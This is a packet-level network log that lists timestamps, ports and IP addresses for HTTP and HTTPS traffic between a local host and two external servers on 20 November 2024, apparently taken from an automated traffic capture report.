Nov 20, 2024 07:50:09.789813995 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789834976 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789858103 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790160894 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790204048 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790218115 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790230036 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790241003 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790260077 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790268898 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790280104 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790281057 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790292025 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790308952 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790309906 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790322065 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790330887 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790332079 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790344000 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.790354967 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790374041 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.790429115 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:14.534837961 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:14.534883022 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:15.885159016 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:15.898858070 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:15.898910046 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:15.898968935 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:15.901604891 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:15.901637077 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.478717089 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.478843927 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.487982035 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.488003016 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.488454103 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.544133902 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.591337919 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.652151108 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.652195930 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.652257919 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.652298927 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.654309988 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.654320002 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.654377937 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.654408932 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.738821030 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.738956928 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.738992929 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.739149094 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.739159107 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.739204884 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.739206076 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.739236116 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.739278078 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.739995956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.740006924 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.740045071 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.740047932 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.740097046 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.740989923 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.741000891 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.741041899 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.741051912 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.741488934 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.741498947 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.741539955 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.741552114 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.752888918 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.827784061 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.827794075 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.827878952 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.827914953 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.828135014 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.828190088 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.828192949 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.828226089 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.828293085 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.828488111 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.828551054 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.828566074 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.829243898 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.829315901 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.829328060 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.830059052 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.830118895 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.830131054 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.830234051 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.830285072 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.830295086 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.831212997 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.831267118 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.831284046 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.847678900 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.871496916 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.871670008 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.871686935 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.914350033 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.914596081 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.914637089 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.914654016 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.914671898 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.915215015 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.915261030 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.915271997 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.915287971 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.915334940 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.915348053 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.916166067 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.916212082 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.916223049 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.916238070 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.916284084 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.916294098 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.917126894 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.917174101 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.917182922 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.917202950 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.917253017 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.917263985 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.918133974 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.918189049 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.918200016 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.929058075 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.929070950 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.929086924 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.929152966 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.929162025 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.929243088 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.929750919 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.957963943 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:16.958079100 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:16.958113909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002222061 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002305031 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.002329111 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002350092 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002398968 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.002408981 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002458096 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002509117 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.002517939 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002535105 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002554893 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.002574921 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.002584934 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.002674103 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.003251076 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003303051 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.003325939 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003349066 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003391981 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.003401995 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003715038 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003763914 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.003774881 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003916979 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.003967047 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.003977060 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.004100084 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.004147053 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.004158020 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.004311085 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.004362106 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.004370928 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.004434109 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.004481077 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.004491091 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.005007982 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.005065918 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.005074978 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.007237911 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.007332087 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.007335901 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.007355928 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.007405043 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.007417917 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.007472992 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.007484913 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.079818010 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.089684010 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.089773893 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.089777946 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.089801073 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.089828968 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.089900970 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.089955091 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.089967012 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090058088 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090109110 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.090118885 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090266943 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090312004 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.090322971 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090337992 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090390921 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.090401888 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090465069 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090513945 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.090524912 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090728045 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090825081 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.090835094 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090878963 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.090923071 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.090933084 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091028929 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091073036 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.091083050 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091170073 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091217041 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.091226101 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091418028 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091464996 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.091474056 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091571093 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091651917 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.091661930 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091676950 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.091727018 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.091737032 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.092061043 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.092111111 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.092119932 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.092140913 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.092192888 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.092204094 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.137048006 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.177319050 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177413940 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177475929 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177506924 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.177527905 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177546978 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.177546978 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.177602053 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177664995 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.177675962 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177788973 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.177849054 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.177860022 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178098917 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178158998 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.178169012 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178338051 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178392887 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.178411007 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178499937 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178558111 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.178569078 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178721905 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178775072 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.178786039 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178929090 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.178986073 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.178996086 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179126978 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179179907 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.179189920 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179210901 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179264069 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.179274082 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179331064 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179383993 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.179394007 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179408073 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179459095 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.179469109 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179481030 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179531097 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.179539919 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179610968 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.179689884 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.179701090 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.190145969 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.265283108 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265392065 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.265407085 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265465975 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265530109 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.265538931 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265712023 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265774965 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.265783072 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265933037 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.265985966 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.265994072 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266160011 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266210079 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.266216993 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266352892 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266407013 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.266413927 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266572952 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266625881 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.266633987 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266895056 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.266952991 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.266961098 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267095089 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267149925 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.267162085 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267271042 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267337084 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.267344952 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267524004 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267580986 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.267589092 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267684937 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267738104 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.267745018 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267849922 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267903090 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.267910004 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.267959118 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.268013954 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.268021107 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.268085003 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.268138885 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.268146038 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.268173933 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.268233061 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.268240929 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.308146000 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.353045940 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353111029 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.353116989 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353131056 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353177071 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.353190899 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353333950 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353391886 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.353400946 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353550911 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353605986 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.353612900 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353765011 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.353822947 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.353832006 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354017973 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354069948 CET	49166	443	192.168.2.22	142.215.209.78
